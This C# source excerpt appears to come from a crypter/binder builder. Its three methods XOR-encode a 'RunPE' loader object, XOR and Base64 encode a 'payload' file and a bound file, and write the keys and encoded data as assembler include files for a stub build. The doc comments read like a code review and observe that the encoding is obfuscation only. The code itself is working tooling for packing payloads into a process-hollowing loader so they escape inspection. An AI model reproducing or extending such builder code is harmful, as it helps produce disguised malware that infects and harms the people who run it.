/// <summary>
/// Creates a fresh 16-byte key, runs the RunPE object file through the XOR routine with it,
/// rewrites that file in place, and emits the key as "runpe_key.inc" in the include directory
/// before asking <c>PEFactory</c> to compile the data section.
/// </summary>
/// <param name="PE">
/// Build context. Only <c>PeDirectory.RunPEObjectPath</c> and <c>PeDirectory.IncludeDirectory</c>
/// are read here; the object is then passed to <c>PEFactory.CompileDataSection</c>.
/// </param>
/// <remarks>
/// The key is written next to the transformed object in readable form, so the XOR pass is
/// obfuscation rather than confidentiality: anyone holding the build directory can reverse it.
/// Artifacts touched by this method: the file at RunPEObjectPath and "runpe_key.inc".
/// </remarks>
public static void EncryptCodeAndAddKey(NewPE PE)
{
    // Key length is fixed at 16 bytes. How Keys.PopulateBuffer fills it is not visible here —
    // presumably random key material; confirm against the Keys implementation.
    byte[] xorKey = new byte[16];
    Keys.PopulateBuffer(xorKey);

    var runPeObjectPath = PE.PeDirectory.RunPEObjectPath;

    // The return value is not used, so EncodeDecodeData appears to transform the buffer in place.
    byte[] runPeBytes = runPeObjectPath.ReadBytes();
    Xor.EncodeDecodeData(runPeBytes, xorKey);

    // Replace the on-disk object with its transformed form.
    if (File.Exists(runPeObjectPath))
    {
        File.Delete(runPeObjectPath);
    }

    runPeObjectPath.WriteFile(runPeBytes);

    // Emit the key as assembler text so the stub can include it at build time.
    string keyIncludePath = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
    string keyAsAsm = xorKey.ToASMBuffer();

    if (File.Exists(keyIncludePath))
    {
        File.Delete(keyIncludePath);
    }

    File.WriteAllText(keyIncludePath, keyAsAsm);

    PEFactory.CompileDataSection(PE);
}
/// <summary>
/// Reads the file at <paramref name="BindPath"/>, runs it through the XOR routine using the key
/// bytes stored at <c>PeDirectory.PayloadKeyIncPath</c>, Base64-encodes the result, and writes the
/// ASCII text to <c>PeDirectory.BindIncPath</c>.
/// </summary>
/// <param name="PE">Build context supplying the key path and the output path.</param>
/// <param name="BindPath">Path of the file to transform. It is not validated before being read.</param>
/// <remarks>
/// No key is generated here: the whole content of the key file is used as the key, so that file
/// must already exist when this runs. NOTE(review): it looks like the key file is the one produced
/// by EncryptAndEncodePayload ("payload_key.bin"), which would make the call order significant —
/// confirm that PayloadKeyIncPath resolves to that file.
/// The output is the same XOR-then-Base64 layering used for the payload, with the same key.
/// </remarks>
public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
{
    byte[] sharedKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
    byte[] bindBytes = BindPath.ReadBytes();

    // The return value is not used, so EncodeDecodeData appears to transform the buffer in place.
    Xor.EncodeDecodeData(bindBytes, sharedKey);

    // Store the transformed bytes as Base64 text; Base64 output is pure ASCII.
    string bindAsBase64 = Convert.ToBase64String(bindBytes);
    byte[] encodedBind = Encoding.ASCII.GetBytes(bindAsBase64);

    var bindIncludePath = PE.PeDirectory.BindIncPath;

    if (File.Exists(bindIncludePath))
    {
        File.Delete(bindIncludePath);
    }

    File.WriteAllBytes(bindIncludePath, encodedBind);
}
/// <summary>
/// Creates a fresh 16-byte key, runs the file at <paramref name="PayloadPath"/> through the XOR
/// routine with it, Base64-encodes the result, and writes three files into the include directory:
/// "payload_length.inc", "payload_key.bin" and "payload.bin".
/// </summary>
/// <param name="PE">Build context; only <c>PeDirectory.IncludeDirectory</c> is read here.</param>
/// <param name="PayloadPath">Path of the file to transform. It is not validated before being read.</param>
/// <remarks>
/// "payload_length.inc" holds the length of the Base64 text, not of the original file, as an
/// eight-digit uppercase hex constant. "payload_key.bin" holds the raw key bytes beside the encoded
/// data, so the layering is obfuscation only: XOR with the key file after Base64-decoding
/// "payload.bin" recovers the input.
/// </remarks>
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
{
    // Key length is fixed at 16 bytes. How Keys.PopulateBuffer fills it is not visible here —
    // presumably random key material; confirm against the Keys implementation.
    byte[] xorKey = new byte[16];
    Keys.PopulateBuffer(xorKey);

    // The return value is not used, so EncodeDecodeData appears to transform the buffer in place.
    byte[] payloadBytes = PayloadPath.ReadBytes();
    Xor.EncodeDecodeData(payloadBytes, xorKey);

    // From here on the buffer is the ASCII bytes of the Base64 text.
    byte[] encodedPayload = Encoding.ASCII.GetBytes(Convert.ToBase64String(payloadBytes));

    // Length constant for the assembler, computed from the encoded size.
    string lengthIncludePath = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
    string lengthDirective = string.Format("PAYLOAD_LENGTH EQU 0x{0}", encodedPayload.Length.ToString("X8"));

    if (File.Exists(lengthIncludePath))
    {
        File.Delete(lengthIncludePath);
    }

    File.WriteAllText(lengthIncludePath, lengthDirective);

    string keyBinPath = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
    string payloadBinPath = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");

    // Both stale outputs are removed before either new file is written.
    if (File.Exists(keyBinPath))
    {
        File.Delete(keyBinPath);
    }

    if (File.Exists(payloadBinPath))
    {
        File.Delete(payloadBinPath);
    }

    File.WriteAllBytes(keyBinPath, xorKey);
    File.WriteAllBytes(payloadBinPath, encodedPayload);
}